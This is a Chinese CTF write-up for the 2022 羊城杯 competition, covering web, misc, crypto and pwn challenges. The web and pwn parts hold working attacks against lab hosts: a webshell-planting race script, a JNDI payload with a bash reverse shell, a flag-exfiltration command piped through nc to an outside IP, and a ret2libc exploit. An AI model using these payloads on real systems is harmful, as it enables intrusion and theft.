开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> PHP知识库 -> 2022年羊城杯wp -> 正文阅读

[PHP知识库]2022年羊城杯wp

web

rce_me

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}

获取webshell，题目中过滤了很多字符，但是可以利用echo写shell,参考链接
https://blog.csdn.net/chizhaji/article/details/113521985?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-113521985-blog-111184583.pc_relevant_multi_platform_whitelistv4&utm_relevant_index=1
发现需要同时发包，利用脚本也可以直接发包

# coding=utf-8
import io
import requests
import threading

sessid = 'flag'
data = {"cmd": "system('cat f*');"}
url = "http://80.endpoint-9588ad86d7e34833b12f992204ec90da.dasc.buuoj.cn:81/"

def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post(url,
                            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php eval($_POST[cmd]);fputs(fopen('a.php','w'),'<?php @eval($_POST[wa1ki0g])?>');?>"},
                            files={'file': ('tgao.txt', f)}, cookies={'PHPSESSID': sessid})

def read(session):
    while True:
        resp = session.post(url+'?file=/tmp/sess_' + sessid,
                            data=data)
        if 'tgao.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            pass

if __name__ == "__main__":
    event = threading.Event()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()

        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
    event.set()

在这里插入图片描述脚本会响应10秒左右报错。但是shell上传成功
读取不到flag，需要提权
内核是Linux，考虑suid提权
find / -perm -u=s -type f 2>/dev/null
利用date来提权
获取flag

step_by_step-v3

<?php
error_reporting(0);
class yang
{
    public $y1;
    public function __construct()
    {
        $this->y1->magic();
    }
    public function __tostring()
    {
        ($this->y1)();
    }
    public function hint()
    {
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}
class cheng
{
    public $c1;
    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }
    public function __invoke()
    {
        $this->c1->hint();
    }
}
class bei
{
    public $b1;
    public $b2;
    public function __set($k1,$k2)
    {
        print $this->b1;
    }
    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}
if (isset($_POST['ans'])) {
    unserialize($_POST['ans']);
} else {
    highlight_file(__FILE__);
}
?>

看代码可以直接调用tostring执行phpinfo，因此直接给类yang y1变量给phpinfo,赋值之后会调用bei类中__set方法，再去调用cheng类中tostring方法执行phpinfo
在这里插入图片描述 pop链

<?php
class yang
{
    public $y1;
}
class cheng
{
    public $c1;
}
class bei
{
    public $b1;
    public $b2;
}
$yang=new yang();
$cheng=new cheng();
$bei=new bei();

$yang->y1="phpinfo";
$bei->b1=$yang;
$cheng->c1=$bei;


echo serialize($cheng);

?>

info中直接搜索flag
在这里插入图片描述

simple_json

打开附件是一个java的包，翻看源码包发现几个可疑点
存在三个路由:
在这里插入图片描述版本为1.8
有2个log4j的包，并且有在Test.class下存在可疑的攻击点
转换json格式

{
    "content":{
        "@type":"ycb.simple_json.service.JNDIService",
        "target":"ldap://101.33.211.155:8087/aaa"
    },
    "msg":{
        "$ref":"$.content.context"
    }
}

所以开始构造
需要用到的工具：https://github.com/Bl0omZ/JNDIEXP

利用链特殊说明
snakeyaml ： command=http://127.0.0.1:8080/exp.jar 加载恶意类。可以使用提供的yaml-payload-master(需要修改代码，重新生成jar，内附使用说明)。无法使用reverseshell。
ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080/exp.jar
ldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwL2V4cC5qYXI%3D
C3p0 ：command=http://127.0.0.1:8080:Exploit(端口为默认为8080) data目录下的Exploit可以进行参考,直接修改Exploit.java的命令使用javac编译(不用另外起http服务)
ldap://ip:port/bypass/snakeyaml/http://127.0.0.1:8080:Exploit
ldap://ip:port/bypass/snakeyaml/base64/aHR0cDovLzEyNy4wLjAuMTo4MDgwOkV4cGxvaXQ%3D

在这里插入图片描述参照这个进行
修改vps地址,再编译，放到工具的同级目录

  8 public class AwesomeScriptEngineFactory implements ScriptEngineFactory {
  9
 10     public AwesomeScriptEngineFactory() {
 11         try {
 12             Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/xx.xx.xx/9998 0>&1");
 13         } catch (IOException e) {
 14             e.printStackTrace();
 15         }
 16     }

在这里插入图片描述用python3起一个http服务

python3 -m http.server 905

在这里插入图片描述将JNDIInject-1.2-SNAPSHOT.jar服务起来
nc监听
burp发包触发

POST /ApiTest/post HTTP/1.1
Host: 8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Length: 258
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Origin: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://8080.endpoint-914652473867461dae1d005085b13c95.dasc.buuoj.cn:81/ApiTest
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
   "content":{
     "@type":"ycb.simple_json.service.JNDIService",
     "target":
     "ldap://xx.xx.xx.xx:1389/snakeyaml/http://xx.xx.xx:905/exp.jar"
    },
    "msg":{
      "$ref":"$.content.context"
    }
}

在这里插入图片描述 shell弹回来了
获取flag

ComeAndLogin

题目为登录可能存在注入
扫描目录存在5个文件访问
在这里插入图片描述只有admin.php页面才能访问，需要admin权限
抓包发现username&password都存在注入
FUZZ发现username处过滤了单引号，并且%27,十六进制都被过滤，直接用反斜杠可以

页面返回正常
接着在password上测试，发现过滤了空格，考虑都使用url编码绕过
在这里插入图片描述登录成功
再访问admin.php
根据代码提示需要以POST接收path参数的值，并且需要有大于三个以上的/,绕过即可
https://blog.csdn.net/m0_62805300/article/details/124218779
在参考文章中使用软连接获取flag
构造payload:

path=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/flag

在这里插入图片描述

Safepop

原题链接：https://xz.aliyun.com/t/10961

<?php
class Fun{
    private $func;
    public function __construct(){
    $this->func = [new Test,'getFlag'];//也可以写为$this->func = "Test::getFlag";这样由于没有实例化Test类，还不会触发Test里的__wakeup()
    }
}
class Test{
    public function getFlag(){
    }
}
class A{
    public $a;
}
class B{
    public $p;
}
$Test = new Test;
$Fun = new Fun;
$a = new A;
$b = new B;
$a->a = $Fun;
$b->a = $a;
$r = serialize($b);
$r1 = str_replace('"Fun":1:','"Fun":2:',$r);
echo urlencode($r1);

不用改直接贴
payload:

?pop=O%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Test%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7D%7D%7D

在这里插入图片描述

MISC

签到

在这里插入图片描述

寻宝

file = open('./寻宝','rb').read()
datalist = ('{:02X}'.format(int(i)) for i in file)
print(datalist)
out = open('./1.txt','w')
for j in list(datalist):
    j = j[::-1]
    out.write(j+'')

解出的文本是十六进制
在这里插入图片描述解出之后为
根据游戏和提示得到钢琴判断字符114514
根据图片看出为差分曼切斯特编码01011111011000010011000101011111解出为_a1_
获取flag.zip密码
零宽度字符隐写

迷失幻境

取证题目，刚好有取证大师
将镜像放入取证大师
存在两个文件，一个是45文本文件，一个是jpg文件
在这里插入图片描述挨个分析两个文件
首先是45文本文件，找了一个正常的png图片和在取证大师的十六进制中45文件对比，发现文件具备png的头部信息，但是缺少png头
将45文件，放入010加补全头部信息
提取出来完整的png图
接着在在取证大师的PNG文件有99张图，抽样分析发现图都是一样的，迷惑而已
在这里插入图片描述导出PNG图，用Stegolve工具异或
接着分析jpg图，是一个萝莉照片，人畜无害
结合png图的key：可莉前来报道，应该是跟萝莉图有关
既然有密码也有图，图片也没有加密，只有考虑为隐写了，使用outguess工具得到flag

outguess -k "可莉前来报道" -r /home/kali/Desktop/test1/h.jpg flag.txt

在这里插入图片描述

where_is_secret

解出压缩包
在这里插入图片描述再通过https://shimo.im/docs/gwpcxkryVJwyJVHR/read里的一起看小说吗

from PIL import Image

def decode(im):
    width,height = im.size
    lst = []
    for y in range(height):
        for x in range(width):
            red,green,blue = im.getpixel((x,y))
            if(blue | green | red) == 0:
                break
            index = (green<<8) + blue
            lst.append(chr(index))
    return ''.join(lst)

if __name__=='__main__':

    all_text = decode(Image.open("./out.bmp","r"))
    with open ("decode.text","w",encoding = "utf-8") as f:
        f.write(all_text)

在这里插入图片描述通过筛选{}中间的值就可以得到h1d3_1n_th3_p1ctur3

Unlimited Zip Works

在这里插入图片描述
解压看到有注释
用zipfile分析压缩包信息并提取注释信息
看到注释里面还有个压缩包
直接提取注释中的压缩包

import zipfile
name = 'file'
infolist = []
num = 1
newzip=b''
while True:
    fz = zipfile.ZipFile(name + '.zip', 'r')
    for i in fz.namelist():
        if "zip" in i:
            filename = i[0:5]
            # print(filename)
    fz.extractall(pwd=bytes(filename, 'utf-8'))
    num += 1
    name = filename
    for j in fz.infolist():
        infolist.append(j.comment)
        if 'flag.txt' in str(j):
            print('[+] 解压完成')
            list2 = infolist[::-1]
            for k in list2:
                newzip += k
            with open('./newfile.zip','wb') as f:
                f.write(newzip)
                print("[+] 成功生成新压缩包newfile.zip")
            exit(0)

在这里插入图片描述新压缩包中还套着压缩包

from zipfile import ZipFile
data = []

with ZipFile( 'newfile.zip', 'r') as zf:
    for i in zf.infolist():
        data.append(i.extra)

with open('flag.zip','wb') as fz:
    for i in data:
        fz.write(i)

脚本直接提
在这里插入图片描述图片没什么内容
010分析下面又是压缩包直接提

躲猫猫

在这里插入图片描述在流量包里发现有个zip将它导出

找到一张png图片

在这里插入图片描述

发现压缩包里的key.log是没有加密的把它导入加解密之后在http2流量里发现了一张jpg图片将它导出

找到压缩包密码

在这里插入图片描述

解出压缩包
在这里插入图片描述看到脚本之后发现是某ctf原题改一下x，y解密出来一张图片
https://blog.csdn.net/weixin_51122085/article/details/125851791
看到图片猜测为Dotcode但是发现这个中间是圆形或者正方形而解密出来的图片是五边形
在左侧列表中看到Maxicode中间是五边形的

在这里插入图片描述

CRYPTO

Easyrsa

import gmpy2

p = 7552850543392291177573335134779451826968284497191536051874894984844023350777357739533061306212635723884437778881981836095720474943879388731913801454095897
c = 38127524839835864306737280818907796566475979451567460500065967565655632622992572530918601432256137666695102199970580936307755091109351218835095309766358063857260088937006810056236871014903809290530667071255731805071115169201705265663551734892827553733293929057918850738362888383312352624299108382366714432727
f = open('output.txt','r')

for i in f.readlines()[::-1]:
    e = 65537
    n = int(i)
    q = n//p
    d = int(gmpy2.invert(e, (p - 1) * (q - 1)))
    m = pow(c, d, n)
    c = m
print(bytes.fromhex(hex(m)[2:]))
f.close()

lrsa

$$
t=(p-58)P+q-kQ\\\\
kQ-(p-58)P=q-t\approx q\\\\
L=\begin{pmatrix}
1&P\\
&Q
\end{pmatrix}\\\\
b=(58-p,k)L=(58-p,q-t)\\\\
|b|\le2^{\frac{1}{4}}det(L)^{\frac{1}{2}}
$$

由上面的式子关系，可以直接格出q-t，而t已知且很小，那么就能得到q

from Crypto.Util.number import *

B=1023
PPQ=17550772391048142376662352375650397168226219900284185133945819378595084615279414529115194246625188015626268312188291451580718399491413731583962229337205180301248556893326419027312533686033888462669675100382278716791450615542537581657011200868911872550652311318486382920999726120813916439522474691195194557657267042628374572411645371485995174777885120394234154274071083542059010253657420242098856699109476857347677270860654429688935924519805555787949683144015873225388396740487817155358042797286990338440987035608851331840925854381286767024584195081004360635842976624747610461507795755042915965483135990495921912997789567020652729777216671481467049291624343256152446367091568361258918212012737611001009003078023715854575413979603297947011959023398306612437250872299406744778763429172689675430968886613391356192380152315042387148665654062576525633130546454743040442444227245763939134967515614637300940642555367668537324892890004459521919887178391559206373513466653484926149453481758790663522317898916616435463486824881406198956479504970446076256447830689197409184703931842169195650953917594642601134810084247402051464584676932882503143409428970896718980446185114397748313655630266379123438583315809104543663538494519415242569480492899140190587129956835218417371308642212037424611690324353109931657289337536406499314388951678319136343913551598851601805737870217800009086551022197432448461112330252097447894028786035069710260561955740514091976513928307284531381150606428802334767412638213776730300093872457594524254858721551285338651364457529927871215183857169772407595348187949014442596356406144157105062291018215254440382214000573515515859668018846789551567310531570458316720877172632139481792680258388798439064221051325274383331521717987420093245521230610073103811158660291643007279940393509663374960353315388446956868294358252276964954745551655711981
PQQ=17632503734712698604217167790453868045296303200715867263641257955056721075502316035280716025016839471684329988600978978424661087892466132185482035374940487837109552684763339574491378951189521258328752145077889261805000262141719400516584216130899437363088936913664419705248701787497332582188063869114908628807937049986360525010012039863210179017248132893824655341728382780250878156526086594253092249935304259986328308203344932540888448163430113818706295806406535364433801544858874357459282988110371175948011077595778123265914357153104206808258347815853145593128831233094769191889153762451880396333921190835200889266000562699392602082643298040136498839726733129090381507278582253125509943696419087708429546384313035073010683709744463087794325058122495375333875728593383803489271258323466068830034394348582326189840226236821974979834541554188673335151333713605570214286605391522582123096490317734786072061052604324131559447145448500381240146742679889154145555389449773359530020107821711994953950072547113428811855524572017820861579995449831880269151834230607863568992929328355995768974532894288752369127771516710199600449849031992434777962666440682129817924824151147427747882725858977273856311911431085373396551436319200582072164015150896425482384248479071434032953021738952688256364397405939276917210952583838731888536160866721278250628482428975748118973182256529453045184370543766401320261730361611365906347736001225775255350554164449014831203472238042057456969218316231699556466298168668958678855382462970622819417830000343573014265235688391542452769592096406400900187933156352226983897249981036555748543606676736274049188713348408983072484516372145496924391146241282884948724825393087105077360952770212959517318021248639012476095670769959011548699960423508352158455979906789927951812368185987838359200354730654103428077770839008773864604836807261909
t=44
c=4364802217291010807437827526073499188746160856656033054696031258814848127341094853323797303333741617649819892633013549917144139975939225893749114460910089509552261297408649636515368831194227006310835137628421405558641056278574098849091436284763725120659865442243245486345692476515256604820175726649516152356765363753262839864657243662645981385763738120585801720865252694204286145009527172990713740098977714337038793323846801300955225503801654258983911473974238212956519721447805792992654110642511482243273775873164502478594971816554268730722314333969932527553109979814408613177186842539860073028659812891580301154746

PQ=GCD(PPQ,PQQ)
P=PPQ//PQ
Q=PQQ//PQ


# sage 
P,Q,t=25947339118736016261419550658264175914664266822085997909314096786508816404704696671837899420298768803641977765786592354116676036035881712512184992851487828263900367476619650087372125353190561974783134059421570649293920248116730478378196277387377082481961542018611824082110164117796622604412648512092528479878502094797494405077897059911764470830302447618882229233093021156725194893124743848364119720591518073753197359351271987724752861168913839307431377592888760273762302003490303315903644695784992125784390012046834505490167165377346036077504298195544062111718133371983287540723388743607671934081891907851056034062109,26068172028162605137516470004551766376185367701690988148920400408760716114172673253571631718337447931195718779018987169967053546674529251665443499183399035216407895285607965767100708187327533611193709308966698251023076404422362272378862918994525181107002728889256377161661579892599243396304207048944032235378667269998644227976609632271355152717352269223310163307304914315780234040829575689991453848537587516055955657960061856059046256125836544109066275645648666876772298883460637600522819402448386193499472702636751025558486665290530268273787746964353937663176851849214999005525738643454160169651485201028944583316101,44

# L=matrix(ZZ,[[1,P],[0,Q]])
# print(L.LLL()[0][1])


a=71239161441539946834999944364158306978517617517717217001776063773301330324729178632534286023377366747004115034635139042058644768011502688969022553791977558750633767627495955645170437100983708648876951588485253787441732757259210010467734037546118780321368088487269039555130213851691659851510403573663333586407
assert isPrime(a+t)

q=a+t
e=65537
d=inverse(e,q-1)
m=pow(c,d,q)

print(long_to_bytes(m))

PWN

在这里插入图片描述 .shell cat/flag | nc 124.223.104.219 1234

fakeNoOutput-v2

from pwn import*
context.log_level='debug'
elf=ELF('fakeNoOutput')

p=remote('tcp.dasc.buuoj.cn',20112)
#p=process('./fakeNoOutput')
libc = ELF('libc.so.6')

head='''head /upload HTTP/1.1
HTTP_SERVER1_token: 
User-Agent: 
Cookie: 
Referer: 
Content-Length: 4196
'''

p.sendline(head)
p.sendline('Content:filename=')

text = 0x080496A1
main = 0x8049F77
setbuf = elf.got['fwrite']

payload='a'*0x1040
payload+='bbbb'
payload+=p32(text)
payload+=p32(main)
payload+=p32(setbuf)
p.sendline(payload + '\n')

p.recvuntil('Connection: close\r\n\r\n')
p.recvuntil('Connection: close\r\n\r\n')

libc_base = u32(p.recv(4))-libc.sym['fwrite']
system = libc_base+libc.sym['system']
binsh = libc_base+libc.search('/bin/sh').next()

p.sendline(head)
p.sendline('Content:filename=')

payload='a'*0x1040
payload+='bbbb'
payload+=p32(system)
payload+='bbbb'
payload+=p32(binsh)

p.sendline(payload + '\n')
p.interactive()